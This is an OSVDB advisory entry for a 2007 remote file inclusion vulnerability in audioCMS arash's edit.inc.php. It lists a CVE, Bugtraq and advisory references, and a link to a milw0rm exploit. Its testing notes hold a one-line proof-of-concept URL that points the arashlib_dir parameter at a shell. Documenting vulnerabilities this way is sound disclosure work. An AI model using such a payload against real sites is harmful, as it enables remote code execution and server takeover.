audioCMS arash edit.inc.php arashlib_dir Variable Remote File Inclusion

2007-04-15T22:19:56
ID OSVDB:35727
Type osvdb
Reporter OSVDB
Modified 2007-04-15T22:19:56

Description

Manual Testing Notes

/[Path]/arash_lib/include/edit.inc.php?arashlib_dir=Shell

References:

Vendor URL: http://sourceforge.net/projects/arash/ Related OSVDB ID: 35730 Related OSVDB ID: 35728 Related OSVDB ID: 35729 Generic Exploit URL: http://www.milw0rm.com/exploits/3744 FrSIRT Advisory: ADV-2007-1396 CVE-2007-2301 Bugtraq ID: 23496